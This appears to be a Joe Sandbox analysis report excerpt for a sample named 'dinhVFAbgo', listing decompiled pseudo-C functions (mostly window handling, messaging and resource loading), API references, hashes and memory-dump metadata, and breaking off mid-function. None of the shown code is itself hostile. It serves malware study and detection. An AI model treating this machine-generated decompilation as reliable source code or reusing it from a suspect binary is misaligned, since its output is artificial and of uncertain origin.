Opcode Fuzzy Hash: e73b67adc25e38b48bb165e0ec6c44b188d0d8099443e2bfa001c4a367ba5da5
Instruction Fuzzy Hash: B211E33230460D3E9A1036B97D82E3B262ADBD17B572B8729F728A21D3EE65CC184134

Uniqueness

Uniqueness Score: -1.00%

Function 00CC2138 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00CC2138(void* __ebx, void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				signed int _v8;
				struct tagRECT _v24;
				intOrPtr _v28;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				int _t41;
				void* _t49;
				void* _t50;
				void* _t51;
				signed int _t52;

				_t48 = __edx;
				_t42 = __ecx;
				_t40 = __ebx;
				_t23 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t23 ^ _t52;
				_t49 = __ecx;
				_v28 = E00CBD9AE(__ebx, __ecx, __edx, __ecx, __fp0);
				_t28 = E00CACA6C(0xe1aa60, E00CB277F(__ebx, _t42, _t48, GetParent( *(_t49 + 0x20))));
				_pop(_t44);
				if(_t28 != 0) {
					_push(__ebx);
					_t41 =  *(_t28 + 0x4dc0);
					if(_t41 != 0) {
						_push(_t50);
						_push(5);
						_push( *(_t49 + 0x20));
						while(1) {
							_t51 = E00CB277F(_t41, _t44, _t48, GetWindow());
							if(_t51 == 0) {
								break;
							}
							_v24.left = _v24.left & 0x00000000;
							_v24.top = _v24.top & 0x00000000;
							_v24.right = _v24.right & 0x00000000;
							_v24.bottom = _v24.bottom & 0x00000000;
							GetWindowRect( *(_t51 + 0x20),  &_v24);
							E00CBA172(_t49,  &_v24);
							OffsetRect( &_v24, 0, _t41);
							_t44 = _t51;
							E00CB7A83(_t51, 0, _v24.left, _v24.top, 0xffffffff, 0xffffffff, 0x15);
							_push(2);
							_push( *(_t51 + 0x20));
						}
						_pop(_t50);
					}
					_pop(_t40);
				}
				return E00DDCBCE(_v28, _t40, _v8 ^ _t52, _t48, _t49, _t50);
			}

0x00cc2138
0x00cc2138
0x00cc2138
0x00cc213e
0x00cc2145
0x00cc2149
0x00cc2153
0x00cc2168
0x00cc216e
0x00cc2171
0x00cc2173
0x00cc2174
0x00cc217c
0x00cc217e
0x00cc217f
0x00cc2181
0x00cc21d5
0x00cc21e1
0x00cc21e5
0x00000000
0x00000000
0x00cc2186
0x00cc218d
0x00cc2191
0x00cc2195
0x00cc219d
0x00cc21a9
0x00cc21b5
0x00cc21c4
0x00cc21cb
0x00cc21d0
0x00cc21d2
0x00cc21d2
0x00cc21e7
0x00cc21e7
0x00cc21e8
0x00cc21e8
0x00cc21f8

APIs

GetParent.USER32(?), ref: 00CC2156
GetWindowRect.USER32 ref: 00CC219D
OffsetRect.USER32(00000000,00000000,?), ref: 00CC21B5
GetWindow.USER32(00000000,00000005), ref: 00CC21D5

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: RectWindow$OffsetParent
String ID:
API String ID: 3516746122-0
Opcode ID: 70953e1af3b96ddd7e8a2d5d3f846ecea5e231dd93d3506c5eb915f6ea94b375
Instruction ID: 04b81a64157b894636f265a7c2aa361ac318d004df1ce9d21c6a5fa6e5b7ff09
Opcode Fuzzy Hash: 70953e1af3b96ddd7e8a2d5d3f846ecea5e231dd93d3506c5eb915f6ea94b375
Instruction Fuzzy Hash: 41219271A0020AAFDF10ABA5CD49FAEB7B9FF04722F100119F541B61D0DB709E04DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4AB8 Relevance: 6.1, APIs: 4, Instructions: 71
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00CB4AB8(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				struct HWND__* _t20;
				intOrPtr* _t29;
				void* _t32;
				intOrPtr* _t34;
				void* _t38;

				_t32 = __edx;
				_t34 = __ecx;
				 *0xe17a64(__edi, __esi, __ebx);
				_t29 = __ecx;
				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x150))))() != 0) {
					 *0xe17a64();
					_t29 = __ecx;
					 *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x1b4))))();
				}
				SendMessageA( *(_t34 + 0x20), 0x1f, 0, 0);
				E00CB52F8(0, _t29, _t32, _t34,  *(_t34 + 0x20), 0x1f, 0, 0, 1, 1);
				_t30 = _t34;
				_t38 = E00CB2C35(0, _t34, _t32, _t34);
				if(_t38 == 0) {
					E00CAA4E7(0, _t30, _t34, _t38, __eflags);
					asm("int3");
					return E00CB1B41(_t30, _v8, 0xe189b0, _v4, _v0);
				} else {
					SendMessageA( *(_t38 + 0x20), 0x1f, 0, 0);
					E00CB52F8(0, _t30, _t32, _t34,  *(_t38 + 0x20), 0x1f, 0, 0, 1, 1);
					_t20 = GetCapture();
					if(_t20 != 0) {
						_t20 = SendMessageA(_t20, 0x1f, 0, 0);
					}
					return _t20;
				}
			}

0x00cb4ab8
0x00cb4abb
0x00cb4ac7
0x00cb4acd
0x00cb4ad3
0x00cb4adf
0x00cb4ae5
0x00cb4ae7
0x00cb4ae7
0x00cb4af2
0x00cb4b03
0x00cb4b08
0x00cb4b0f
0x00cb4b13
0x00cb4b4b
0x00cb4b50
0x00cb4b68
0x00cb4b15
0x00cb4b1c
0x00cb4b2d
0x00cb4b32
0x00cb4b3a
0x00cb4b41
0x00cb4b41
0x00cb4b4a
0x00cb4b4a

APIs

SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00CB4AF2
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00CB4B1C
GetCapture.USER32 ref: 00CB4B32
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00CB4B41

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: b96762d3316474b2802c8b78fce3ce887f44b693dfd63cb04e8a8d105d9a1b1d
Instruction ID: 856b8b24b673373d34bbafa656c4b28fb48d073078084295815a1d156a92d578
Opcode Fuzzy Hash: b96762d3316474b2802c8b78fce3ce887f44b693dfd63cb04e8a8d105d9a1b1d
Instruction Fuzzy Hash: 0B11BF71344709BFEA112F61DC89FFE7B7EFF48B81F044024B6456B2A2CB619D10A660

Uniqueness

Uniqueness Score: -1.00%

Function 00DF4C94 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00DF4C94(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0xe68f54; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00DF52BC(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E00DF5650(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E00DF52BC(__eflags,  *0xe68f54, _t18);
							if(__eflags != 0) {
								E00DF496B(_t18, 0xe89678);
								E00DF47C5(0);
								goto L13;
							} else {
								_t13 = 0;
								E00DF52BC(__eflags,  *0xe68f54, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00DF52BC(0,  *0xe68f54, 0);
							_push(0);
							L9:
							E00DF47C5();
							goto L4;
						}
					}
				} else {
					_t18 = E00DF527D(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0xe68f54; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x00df4c9f
0x00df4ca1
0x00df4ca6
0x00df4ca9
0x00df4cc7
0x00df4cca
0x00df4ccf
0x00df4cd1
0x00000000
0x00df4cd3
0x00df4cdf
0x00df4ce3
0x00df4ce5
0x00df4d0a
0x00df4d0c
0x00df4d25
0x00df4d2c
0x00000000
0x00df4d0e
0x00df4d0e
0x00df4d17
0x00df4d1c
0x00000000
0x00df4d1c
0x00df4ce7
0x00df4ce7
0x00df4ce7
0x00df4cf0
0x00df4cf5
0x00df4cf6
0x00df4cf6
0x00000000
0x00df4cfb
0x00df4ce5
0x00df4cab
0x00df4cb1
0x00df4cb5
0x00df4cc2
0x00000000
0x00df4cb7
0x00df4cba
0x00df4d34
0x00df4d34
0x00df4cbc
0x00df4cbc
0x00df4cbc
0x00df4cbe
0x00df4cbe
0x00df4cbe
0x00df4cba
0x00df4cb5
0x00df4d37
0x00df4d3f
0x00df4d48

APIs

GetLastError.KERNEL32(00000000,?,00000001,00DE58BF,00DEAEE6,00000000,00000104,?,00CA6092,?,00000104,\Update.ini,?,00000000,000000F1), ref: 00DF4C99
_free.LIBCMT ref: 00DF4CF6
_free.LIBCMT ref: 00DF4D2C
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CA6092,?,00000104,\Update.ini,?,00000000,000000F1), ref: 00DF4D37

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 000d464e2844eff0a43b10ac771dfd30199e369c98db3b0d55d8f96c52ff695b
Instruction ID: 2ad89c0816a95b4b0477b7aee261f3e6f79a1e15b35ca4bf23851a68a002b741
Opcode Fuzzy Hash: 000d464e2844eff0a43b10ac771dfd30199e369c98db3b0d55d8f96c52ff695b
Instruction Fuzzy Hash: 8B110C7130251D3ED62037797E82D7B265ADBD17B072B8729F72CA21D3EE658C194134

Uniqueness

Uniqueness Score: -1.00%

Function 00CBC08C Relevance: 6.1, APIs: 4, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00CBC08C(void* __ecx, void* __edx, void* __fp0) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				struct HWND__** _v28;
				struct HWND__* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				struct HDWP__* _t25;
				struct HWND__** _t26;
				struct HWND__* _t27;
				signed int _t31;
				void* _t38;
				struct HDWP__* _t39;
				void* _t46;
				void* _t47;
				void* _t48;
				intOrPtr* _t49;
				signed int _t50;
				void* _t54;

				_t54 = __fp0;
				_t46 = __edx;
				_t22 =  *0xe68dd4; // 0x8d2643c2
				_t23 = _t22 ^ _t50;
				_v8 = _t22 ^ _t50;
				_t47 = __ecx;
				if( *(__ecx + 0x1c) == 0) {
					L7:
					return E00DDCBCE(_t23, _t38, _v8 ^ _t50, _t46, _t47, _t48);
				} else {
					_push(_t38);
					_push(_t48);
					_t25 = BeginDeferWindowPos( *(__ecx + 0x1c));
					_t49 =  *((intOrPtr*)(_t47 + 0x14));
					_t39 = _t25;
					while(_t49 != 0) {
						_t26 =  *(_t49 + 8);
						_t49 =  *_t49;
						_v28 = _t26;
						_t27 =  *_t26;
						_v32 = _t27;
						if(IsWindow(_t27) != 0) {
							_v24 = 0;
							_v20 = 0;
							_v16 = 0;
							_v12 = 0;
							_t31 = E00CBC139(_t47, _t47, _t54, _v28,  &_v24);
							if((_t31 & 0x00000003) != 3) {
								DeferWindowPos(_t39, _v32, 0, _v24, _v20, _v16 - _v24, _v12 - _v20, _t31 | 0x00000314);
							}
						}
					}
					_t23 = EndDeferWindowPos(_t39);
					_pop(_t48);
					_pop(_t38);
					goto L7;
				}
			}

0x00cbc08c
0x00cbc08c
0x00cbc092
0x00cbc097
0x00cbc099
0x00cbc09d
0x00cbc0a3
0x00cbc12c
0x00cbc138
0x00cbc0a9
0x00cbc0a9
0x00cbc0aa
0x00cbc0ae
0x00cbc0b4
0x00cbc0b7
0x00cbc11f
0x00cbc0bb
0x00cbc0be
0x00cbc0c0
0x00cbc0c3
0x00cbc0c6
0x00cbc0d1
0x00cbc0d7
0x00cbc0da
0x00cbc0dd
0x00cbc0e0
0x00cbc0ea
0x00cbc0f7
0x00cbc119
0x00cbc119
0x00cbc0f7
0x00cbc0d1
0x00cbc124
0x00cbc12a
0x00cbc12b
0x00000000
0x00cbc12b

APIs

BeginDeferWindowPos.USER32(00000000), ref: 00CBC0AE
IsWindow.USER32(?), ref: 00CBC0C9
DeferWindowPos.USER32(00000000,?,00000000,?,?,?,?,00000000), ref: 00CBC119
EndDeferWindowPos.USER32(00000000,?,?,?,?,?,?,?,00CBC415,00000000), ref: 00CBC124

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$Defer$Begin
String ID:
API String ID: 2880567340-0
Opcode ID: aa89eadf8b986dfb958f0fb99fddfa8de33e214453b8b21a13ac01c1d9deb455
Instruction ID: 95e877c0bc9c63ce6c10f6f77cbdceff6f96e3225c57a0fcef5c70c8748cf9fe
Opcode Fuzzy Hash: aa89eadf8b986dfb958f0fb99fddfa8de33e214453b8b21a13ac01c1d9deb455
Instruction Fuzzy Hash: 7F210871A0010AAFCB11DFA9DD85AEEBBF9EB08300F10446AE511F3251DB34AA40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0169D Relevance: 6.1, APIs: 4, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00D0169D(void* __ecx, void* __fp0, signed short _a4) {
				void* _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				void _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t31;
				void* _t36;
				signed short _t46;
				void* _t47;
				void* _t55;

				_t55 = __fp0;
				_t47 = __ecx;
				_t46 = _a4;
				if( *((intOrPtr*)(__ecx + 0x1db8)) != _t46) {
					 *(__ecx + 0x1dd4) =  *(__ecx + 0x1dd4) & 0x00000000;
					_t36 = __ecx + 0xd50;
					if( *((intOrPtr*)(__ecx + 0xd54)) > 0) {
						_t25 = E00CDAF6F(_t36);
					}
					 *(_t47 + 0x1db8) =  *(_t47 + 0x1db8) & 0x00000000;
					_t50 = _t46;
					if(_t46 != 0) {
						_t31 = LoadImageW( *(E00CACEEE(_t36, _t46, _t47, _t50) + 0xc), _t46 & 0x0000ffff, 0, 0, 0, 0x3000);
						_v8 = _t31;
						_t51 = _t31;
						if(_t31 != 0) {
							GetObjectA(_t31, 0x18,  &_v32);
							_push(0);
							_push(_v8);
							 *((intOrPtr*)(_t47 + 0xda4)) = _v28;
							 *((intOrPtr*)(_t47 + 0xda8)) = _v24;
							L00CDAB41(_t36, _t36, _t46, _t47, _t51, _t55);
							 *(_t47 + 0x1db8) = _t46;
						}
						_t25 = E00CC19ED();
						 *(_t47 + 0x1dd4) = 0 |  *((intOrPtr*)(_t25 + 0x1ac)) - 0x00000008 > 0x00000000;
					}
					if( *(_t47 + 0x20) != 0) {
						InvalidateRect( *(_t47 + 0x20), 0, 1);
						return UpdateWindow( *(_t47 + 0x20));
					}
				}
				return _t25;
			}

0x00d0169d
0x00d016a4
0x00d016a7
0x00d016b0
0x00d016b6
0x00d016c5
0x00d016cb
0x00d016cf
0x00d016cf
0x00d016d4
0x00d016db
0x00d016dd
0x00d016f6
0x00d016fc
0x00d016ff
0x00d01701
0x00d0170a
0x00d01718
0x00d0171a
0x00d0171d
0x00d01723
0x00d01729
0x00d0172e
0x00d0172e
0x00d01734
0x00d01745
0x00d01745
0x00d01750
0x00d01759
0x00000000
0x00d01762
0x00d01750
0x00d0176b

APIs

LoadImageW.USER32 ref: 00D016F6
GetObjectA.GDI32(00000000,00000018,?), ref: 00D0170A
InvalidateRect.USER32(00000000,00000000,00000001), ref: 00D01759
UpdateWindow.USER32(00000000), ref: 00D01762

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ImageInvalidateLoadObjectRectUpdateWindow
String ID:
API String ID: 3870781972-0
Opcode ID: f40832b541ccad928f70ec2b6d4f0725f979a3d3a52e5deadcab9cc8c218f598
Instruction ID: 6c143dccce87841937fde608bc9769d129139157a945f654903a09a9d01057d0
Opcode Fuzzy Hash: f40832b541ccad928f70ec2b6d4f0725f979a3d3a52e5deadcab9cc8c218f598
Instruction Fuzzy Hash: 9F21A271500700EFD7209F75CC85BEBB7F9EF84701F14442EE98A96191D774A844DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CBF3C4 Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00CBF3C4(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t20;
				intOrPtr _t22;
				intOrPtr _t32;
				CHAR* _t33;
				void* _t36;
				void* _t38;
				CHAR* _t40;
				struct HRSRC__* _t42;
				void* _t43;
				intOrPtr _t45;

				_t38 = __edx;
				_t35 = __ecx;
				_push(__ecx);
				_t45 = _a4;
				_t32 = __ecx;
				_v8 = __ecx;
				_t40 =  *(_t45 + 0xc);
				if(( *(_t45 + 4) & 0x00000001) == 0) {
					_t42 = FindResourceA( *(_t45 + 8), _t40, 5);
					if(_t42 == 0) {
						E00CB9B50(_t32, _t35, _t38);
					}
					_t43 = LoadResource( *(_t45 + 8), _t42);
					if(_t43 == 0) {
						E00CB9B50(_t32, _t35, _t38);
					}
					_t40 = LockResource(_t43);
					_t50 = _t40;
					if(_t40 == 0) {
						E00CB9B50(_t32, _t35, _t38);
					}
				}
				_t20 = E00CACEEE(_t32, _t40, _t45, _t50);
				_t51 =  *((intOrPtr*)(_t20 + 0x3c));
				if( *((intOrPtr*)(_t20 + 0x3c)) != 0) {
					_t40 = E00CBEAE7(_t32, _t40);
				}
				_push(_a8);
				_push(_t40);
				_t33 = E00CBF615(_t32, _t38, _t40, _t45, _t51);
				_t22 = _v8;
				_t36 =  *(_t22 + 0x88);
				if(_t36 != 0) {
					GlobalFree(_t36);
					_t22 = _v8;
					 *(_t22 + 0x88) =  *(_t22 + 0x88) & 0x00000000;
				}
				if(_t33 != 0) {
					_t40 = _t33;
					 *(_t22 + 0x88) = _t33;
				}
				 *(_t45 + 4) =  *(_t45 + 4) | 0x00000001;
				 *(_t45 + 0xc) = _t40;
				return _t22;
			}

0x00cbf3c4
0x00cbf3c4
0x00cbf3c7
0x00cbf3ca
0x00cbf3cd
0x00cbf3d0
0x00cbf3d7
0x00cbf3da
0x00cbf3e8
0x00cbf3ec
0x00cbf3ee
0x00cbf3ee
0x00cbf3fd
0x00cbf401
0x00cbf403
0x00cbf403
0x00cbf40f
0x00cbf411
0x00cbf413
0x00cbf415
0x00cbf415
0x00cbf413
0x00cbf41a
0x00cbf41f
0x00cbf423
0x00cbf42d
0x00cbf42d
0x00cbf42f
0x00cbf432
0x00cbf438
0x00cbf43a
0x00cbf43d
0x00cbf445
0x00cbf448
0x00cbf44e
0x00cbf451
0x00cbf451
0x00cbf45a
0x00cbf45c
0x00cbf45e
0x00cbf45e
0x00cbf464
0x00cbf468
0x00cbf46f

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 00CBF3E2
LoadResource.KERNEL32(?,00000000,?,?,00000000,00000000,?,00CBE2EB,?,?,?,?,?), ref: 00CBF3F7
LockResource.KERNEL32(00000000,?,?,00000000,00000000,?,00CBE2EB,?,?,?,?,?), ref: 00CBF409
GlobalFree.KERNEL32 ref: 00CBF448

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Resource$FindFreeGlobalLoadLock
String ID:
API String ID: 3898064442-0
Opcode ID: 5c024b9417d8d8e8ded558360e2be05ee30e200db42680229391e5886db46f8a
Instruction ID: 91d0d39dd8e5fff63d99001714eaaec88b1eba03ca787429e9b818374597fb35
Opcode Fuzzy Hash: 5c024b9417d8d8e8ded558360e2be05ee30e200db42680229391e5886db46f8a
Instruction Fuzzy Hash: 12119D31100601ABDB21AF55D848AABBBF8EF84724F15807DE96993221DA70ED06AB20

Uniqueness

Uniqueness Score: -1.00%

Function 00CB8BF3 Relevance: 6.1, APIs: 4, Instructions: 62
windowCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00CB8BF3(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* _a4, intOrPtr _a8, long* _a12) {
				struct HWND__* _v8;
				void* __esi;
				void* __ebp;
				signed int _t17;
				long _t20;
				int _t21;
				CHAR* _t22;
				intOrPtr* _t28;
				long* _t29;
				void* _t32;
				void* _t33;
				int _t34;
				intOrPtr* _t37;
				long* _t38;

				_t33 = __edi;
				_t32 = __edx;
				_t25 = __ebx;
				_push(__ecx);
				_t37 = _a4;
				E00CB76FC( *((intOrPtr*)(_t37 + 4)), _a8,  &_v8);
				_t17 = GetWindowLongA(_v8, 0xfffffff0);
				_push(_a8);
				_t28 = _t37;
				if((_t17 & 0x00000003) == 3) {
					E00CB8E10(__ebx, _t28, _t32);
				} else {
					E00CB8E10(__ebx, _t28, _t32);
					 *((intOrPtr*)(_t37 + 0xc)) = 1;
				}
				if( *_t37 == 0) {
					_t38 = _a12;
					_t20 = SendMessageA(_v8, 0x14d, 0xffffffff,  *_t38);
					if(_t20 == 0xffffffff) {
						_push( *_t38);
						_t20 = E00CB8416(_t32, _v8);
					}
				} else {
					_push(_t33);
					_t21 = GetWindowTextLengthA(_v8);
					_t40 = _a12;
					_t34 = _t21;
					_t29 = _a12;
					if(_t34 <= 0) {
						_t22 = E00CA2BCE(_t25, _t29, _t40, 0xff);
						_push(0x100);
					} else {
						_t22 = E00CAAD2A(_t29, _t34);
						_t10 = _t34 + 1; // 0x1
					}
					GetWindowTextA(_v8, _t22, ??);
					_t20 = E00CA67F5(_t40, 0xffffffff);
				}
				return _t20;
			}

0x00cb8bf3
0x00cb8bf3
0x00cb8bf3
0x00cb8bf6
0x00cb8bf8
0x00cb8c05
0x00cb8c0f
0x00cb8c15
0x00cb8c1b
0x00cb8c1f
0x00cb8c2f
0x00cb8c21
0x00cb8c21
0x00cb8c26
0x00cb8c26
0x00cb8c37
0x00cb8c7f
0x00cb8c8e
0x00cb8c97
0x00cb8c99
0x00cb8c9e
0x00cb8c9e
0x00cb8c39
0x00cb8c39
0x00cb8c3d
0x00cb8c43
0x00cb8c46
0x00cb8c48
0x00cb8c4c
0x00cb8c5f
0x00cb8c64
0x00cb8c4e
0x00cb8c4f
0x00cb8c54
0x00cb8c57
0x00cb8c6d
0x00cb8c77
0x00cb8c7c
0x00cb8ca5

APIs

Part of subcall function 00CB76FC: GetDlgItem.USER32 ref: 00CB770D

GetWindowLongA.USER32 ref: 00CB8C0F
GetWindowTextLengthA.USER32(?), ref: 00CB8C3D
GetWindowTextA.USER32 ref: 00CB8C6D
SendMessageA.USER32(?,0000014D,000000FF,?), ref: 00CB8C8E

Part of subcall function 00CB8416: _strlen.LIBCMT ref: 00CB843B
Part of subcall function 00CB8416: GetWindowTextA.USER32 ref: 00CB846C
Part of subcall function 00CB8416: lstrcmpA.KERNEL32(?,00CB050B,?,00000000), ref: 00CB847E
Part of subcall function 00CB8416: SetWindowTextA.USER32(?,00CB050B), ref: 00CB848A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Window$Text$ItemLengthLongMessageSend_strlenlstrcmp
String ID:
API String ID: 2835751574-0
Opcode ID: 1ef5a7a3de248b75a13de24e4408f7d98dced3a2240bc179e155e206ae3c7b4c
Instruction ID: 63306bccf692e531c2c6e73fa07c6ae59c31dc53d9cc42b8ab25968f4190522d
Opcode Fuzzy Hash: 1ef5a7a3de248b75a13de24e4408f7d98dced3a2240bc179e155e206ae3c7b4c
Instruction Fuzzy Hash: 6B11677140511AEBCF11AF68CD06EEDBB7AAF45720F204214F861661E0CB71AA58EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC2DF8 Relevance: 6.1, APIs: 4, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00CC2DF8(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				void* _v72;
				signed int _t11;
				void* _t25;
				void* _t29;
				void* _t32;
				void* _t35;
